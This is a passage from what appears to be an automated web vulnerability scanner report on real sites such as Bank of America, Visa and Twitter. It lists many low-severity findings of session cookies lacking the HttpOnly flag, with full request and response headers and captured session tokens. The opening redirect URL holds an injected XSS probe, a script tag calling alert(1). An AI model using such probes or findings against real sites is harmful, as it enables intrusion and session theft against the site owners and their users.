Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmTPSet=Y; TCID=0007ae71-9ad3-3b5c-9719-884700000028; NSC_CbolPgBnfsjdb=445b32097852; throttle_value=21

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 22:04:44 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: CoreID6=30041296684284122624552; path=/; expires=Sun, 01 Feb 2026 22:04:44 GMT
Set-Cookie: TestSess3=30041296684284122624552;path=/
Location: http://data.coremetrics.com/cm?tid=1&ci=90010394&vn2=e4.0&st=1296684336309&vn1=4.2.7.1BOA&ec=utf-8&pi=AboutBAC%3AHelp%3APageNotFound%3BCF-HTTP-PageNotFound&cg=AboutBAC%3AHelp%3APageNotFound&rnd=1296688180794&ul=http%3A//www.bankofamerica.com/findit/error.cgi&pv11=%7C000302027g850000c336%7C&rf=http%3A//www.bankofamerica.com/vehicle_and_personal_loans544ce%2522%253E%253Cscript%253Ealert%281%29%253C/script%253E45ae18a6011/index.cfm&cvdone=p&cmig=y
Content-Type: text/plain; charset=UTF-8
Content-Length: 0


11.49. http://solutions.liveperson.com/ref/lppb.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://solutions.liveperson.com
Path:   /ref/lppb.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ref/lppb.asp HTTP/1.1
Host: solutions.liveperson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Thu, 03 Feb 2011 01:04:58 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Location: pbl.asp
Content-Length: 128
Content-Type: text/html
Set-Cookie: visitor=ref=LP+Power+%2D+; expires=Sun, 10-Jan-2010 05:00:00 GMT; domain=.liveperson.com; path=/
Set-Cookie: ASPSESSIONIDQSDTDCQS=BDCPFOICCKLENOGJKIBLOLMG; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="pbl.asp">here</a>.</body>

11.50. https://support01.arbornetworks.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://support01.arbornetworks.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: support01.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:05:00 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.8d PHP/5.2.3
X-Powered-By: PHP/5.2.3
Set-Cookie: PHPSESSID=2eba1bedd93d630fa422ccbd7765c32e; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 1713
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...

11.51. http://thehill.com/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://thehill.com
Path:   /blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more HTTP/1.1
Host: thehill.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:04:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 03 Feb 2011 01:19:58 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: PHPSESSID=k2q7s7bd7dtdm25nb0rni4rg00; path=/
Connection: close
Content-Length: 73954

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...

11.52. http://twitter.com/PracticalMoney  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /PracticalMoney

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PracticalMoney HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 22:02:41 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296684161-47748-46212
ETag: "123020b57eac8841ca216e71073e2ac7"
Last-Modified: Wed, 02 Feb 2011 22:02:41 GMT
X-Runtime: 0.01070
Content-Type: text/html; charset=utf-8
Content-Length: 50296
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296684161371599; path=/; expires=Wed, 09-Feb-11 22:02:41 GMT; domain=.twitter.com
Set-Cookie: guest_id=129668416138493212; path=/; expires=Fri, 04 Mar 2011 22:02:41 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCGkZZugtAToHaWQiJTZkMDhhYzVkZmFmMDBh%250AZGI1Y2ZlNjUwMTRjM2U4NmRiIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--ec51ce26345a482a3890029a850bf2fabb529608; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.53. http://twitter.com/navyfederalnews  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /navyfederalnews

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /navyfederalnews HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 22:02:42 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296684162-28021-53593
ETag: "f8784a8a1866b0cf5f586d1676f574b8"
Last-Modified: Wed, 02 Feb 2011 22:02:42 GMT
X-Runtime: 0.01594
Content-Type: text/html; charset=utf-8
Content-Length: 55640
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296684161892555; path=/; expires=Wed, 09-Feb-11 22:02:41 GMT; domain=.twitter.com
Set-Cookie: guest_id=129668416203448535; path=/; expires=Fri, 04 Mar 2011 22:02:42 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCPYbZugtAToHaWQiJTk2YjVjMzRiODFjOGZk%250AYjYyMDYzN2RiNmZkOGJmZTQ4IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--7afe7bcaae311831c57885dd7cd5733609b08898; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.54. http://usa.visa.com/cardadvisor/CardAdvisor  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://usa.visa.com
Path:   /cardadvisor/CardAdvisor

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cardadvisor/CardAdvisor HTTP/1.1
Host: usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.12.5.1296684032693; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Server: Microsoft-IIS/7.0
Server: Web1
Content-Length: 107268
Expires: Wed, 02 Feb 2011 22:03:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 02 Feb 2011 22:03:05 GMT
Connection: close
Set-Cookie: JSESSIONID=0001Cs1i2YjocCCkEvebin92LOI:16CTJ7EH2K; Path=/
Set-Cookie: random=1248; Expires=Wed, 02 Feb 2011 22:04:03 GMT
Set-Cookie: NSC_WJTB_21793_72.46.234.157_80=ffffffff0972250045525d5f4f58455e445a4a423660;expires=Wed, 02-Feb-2011 22:33:05 GMT;path=/;httponly
P3P:


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang
...[SNIP]...

11.55. http://usa.visa.com/personal/account-inquiries/card_providers.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://usa.visa.com
Path:   /personal/account-inquiries/card_providers.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal/account-inquiries/card_providers.jsp HTTP/1.1
Host: usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.12.5.1296684032693; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Server: Microsoft-IIS/7.0
Server: Web1
Content-Length: 135805
Expires: Wed, 02 Feb 2011 22:02:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 02 Feb 2011 22:02:55 GMT
Connection: close
Set-Cookie: JSESSIONID=00017U1BI8Cl_rntvA7DwW4jzMZ:16CTJ7EH2K; Path=/
Set-Cookie: NSC_WJTB_21793_72.46.234.157_80=ffffffff0972250045525d5f4f58455e445a4a423660;expires=Wed, 02-Feb-2011 22:32:55 GMT;path=/;httponly
P3P:


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...

11.56. http://usa.visa.com/personal/discounts/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://usa.visa.com
Path:   /personal/discounts/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal/discounts/index.jsp HTTP/1.1
Host: usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.3.9.1296683997731; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Server: Microsoft-IIS/7.0
Server: Web1
Content-Length: 78343
Expires: Wed, 02 Feb 2011 22:00:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 02 Feb 2011 22:00:13 GMT
Connection: close
Set-Cookie: JSESSIONID=0001_Q-WjgBrcpjGCfHAbmfhS98:16CTJ7EH2K; Path=/
Set-Cookie: NSC_WJTB_21793_72.46.234.157_80=ffffffff0972255245525d5f4f58455e445a4a423660;expires=Wed, 02-Feb-2011 22:30:13 GMT;path=/;httponly
P3P:


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Sp
...[SNIP]...

11.57. http://usa.visa.com/personal/security/identity_theft_search.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://usa.visa.com
Path:   /personal/security/identity_theft_search.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal/security/identity_theft_search.jsp HTTP/1.1
Host: usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.12.5.1296684032693; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;

Response

HTTP/1.1 200 OK
Content-Length: 10702
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Server: Microsoft-IIS/7.0
Server: Web2
Expires: Wed, 02 Feb 2011 22:02:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 02 Feb 2011 22:02:52 GMT
Connection: close
Set-Cookie: JSESSIONID=0001rvJFfkPDxSxCzcaGjfsQNLI:228FL7VA3T; Path=/
Set-Cookie: NSC_WJTB_21793_72.46.234.157_80=ffffffff0972255245525d5f4f58455e445a4a423660;expires=Wed, 02-Feb-2011 22:32:52 GMT;path=/;httponly
P3P:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...

11.58. http://usa.visa.com/personal/student/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://usa.visa.com
Path:   /personal/student/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal/student/index.jsp HTTP/1.1
Host: usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.12.5.1296684032693; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;

Response

HTTP/1.1 200 OK
Content-Length: 19265
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Server: Microsoft-IIS/7.0
Server: Web1
Expires: Wed, 02 Feb 2011 22:02:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 02 Feb 2011 22:02:56 GMT
Connection: close
Set-Cookie: JSESSIONID=0001kvLTBGb4sr9Ciw3lqUweJdE:16CTJ7EH2K; Path=/
Set-Cookie: NSC_WJTB_21793_72.46.234.157_80=ffffffff0972255245525d5f4f58455e445a4a423660;expires=Wed, 02-Feb-2011 22:32:56 GMT;path=/;httponly
P3P:


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang
...[SNIP]...

11.59. http://usa.visa.com/personal/visa_brings_you/mytaxrefund.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://usa.visa.com
Path:   /personal/visa_brings_you/mytaxrefund.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal/visa_brings_you/mytaxrefund.jsp HTTP/1.1
Host: usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.3.9.1296683997731; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;

Response

HTTP/1.1 200 OK
Content-Length: 13369
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Server: Microsoft-IIS/7.0
Server: Web1
Expires: Wed, 02 Feb 2011 22:00:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 02 Feb 2011 22:00:16 GMT
Connection: close
Set-Cookie: JSESSIONID=000172BuJJ0vb9N920_EytpyRkI:16CTJ7EH2K; Path=/
Set-Cookie: NSC_WJTB_21793_72.46.234.157_80=ffffffff0972250045525d5f4f58455e445a4a423660;expires=Wed, 02-Feb-2011 22:30:16 GMT;path=/;httponly
P3P:


<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html class="sIFR-hasFlash" xml:lang="en" xmlns="http://www.w3.org/1999/xht
...[SNIP]...

11.60. http://usa.visa.com/specialOffers/AOLVisaOffers/offers.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://usa.visa.com
Path:   /specialOffers/AOLVisaOffers/offers.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /specialOffers/AOLVisaOffers/offers.jsp HTTP/1.1
Host: usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.12.5.1296684032693; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;

Response

HTTP/1.1 200 OK
Content-Length: 9529
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Server: Microsoft-IIS/7.0
Server: Web1
Expires: Wed, 02 Feb 2011 22:03:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 02 Feb 2011 22:03:00 GMT
Connection: close
Set-Cookie: JSESSIONID=0001di3A708cu86UxQsZbPBeE4z:16CTJ7EH2K; Path=/
Set-Cookie: NSC_WJTB_21793_72.46.234.157_80=ffffffff0972255245525d5f4f58455e445a4a423660;expires=Wed, 02-Feb-2011 22:33:00 GMT;path=/;httponly
P3P:


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>
   <title>Visa Rewards Online | Shopping Offers</title>
   <meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

11.61. http://usa.visa.com/specialOffers/CMS/offers.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://usa.visa.com
Path:   /specialOffers/CMS/offers.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /specialOffers/CMS/offers.jsp HTTP/1.1
Host: usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.12.5.1296684032693; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;

Response

HTTP/1.1 200 OK
Content-Length: 9228
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Server: Microsoft-IIS/7.0
Server: Web2
Expires: Wed, 02 Feb 2011 22:03:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 02 Feb 2011 22:03:01 GMT
Connection: close
Set-Cookie: JSESSIONID=000188XY90siFb7KU8ACtUNR4nF:228FL7VA3T; Path=/
Set-Cookie: NSC_WJTB_21793_72.46.234.157_80=ffffffff0972255245525d5f4f58455e445a4a423660;expires=Wed, 02-Feb-2011 22:33:01 GMT;path=/;httponly
P3P:


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>
   <title>Visa Rewards Online | Shopping Offers</title>
   <meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

11.62. http://usa.visa.com/specialOffers/Yahoo/offers.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://usa.visa.com
Path:   /specialOffers/Yahoo/offers.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /specialOffers/Yahoo/offers.jsp HTTP/1.1
Host: usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.12.5.1296684032693; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;

Response

HTTP/1.1 200 OK
Content-Length: 9354
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Server: Microsoft-IIS/7.0
Server: Web1
Expires: Wed, 02 Feb 2011 22:03:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 02 Feb 2011 22:03:01 GMT
Connection: close
Set-Cookie: JSESSIONID=0001oIkrQ9tMaEKB-eehvfZZ2Gg:16CTJ7EH2K; Path=/
Set-Cookie: NSC_WJTB_21793_72.46.234.157_80=ffffffff0972250045525d5f4f58455e445a4a423660;expires=Wed, 02-Feb-2011 22:33:01 GMT;path=/;httponly
P3P:


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>
   <title>Visa Rewards Online | Shopping Offers</title>
   <meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

11.63. https://usa.visa.com/signaturesouthwest/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://usa.visa.com
Path:   /signaturesouthwest/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /signaturesouthwest/index.jsp HTTP/1.1
Host: usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.3.9.1296683997731; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Server: Microsoft-IIS/7.0
Server: WebSphere Application Server/6.1
Content-Length: 47255
Expires: Wed, 02 Feb 2011 22:00:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 02 Feb 2011 22:00:39 GMT
Connection: close
Set-Cookie: JSESSIONID=0001VKlai2ZsKlTeafG4JBzP1Nr:228FL7VA3T; Path=/
P3P:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...

11.64. https://usa.visa.com/specialOffers/FUSA_Amazon/offers.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://usa.visa.com
Path:   /specialOffers/FUSA_Amazon/offers.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /specialOffers/FUSA_Amazon/offers.jsp HTTP/1.1
Host: usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.12.5.1296684032693; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;

Response

HTTP/1.1 200 OK
Content-Length: 9470
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Server: Microsoft-IIS/7.0
Server: WebSphere Application Server/6.1
Expires: Wed, 02 Feb 2011 22:03:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 02 Feb 2011 22:03:02 GMT
Connection: close
Set-Cookie: JSESSIONID=0001gwyQs-o2EJ3BQoQrJFaalkY:228FL7VA3T; Path=/
P3P:


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>
   <title>Visa Rewards Online | Shopping Offers</title>
   <meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

11.65. http://visa.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://visa.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: visa.com
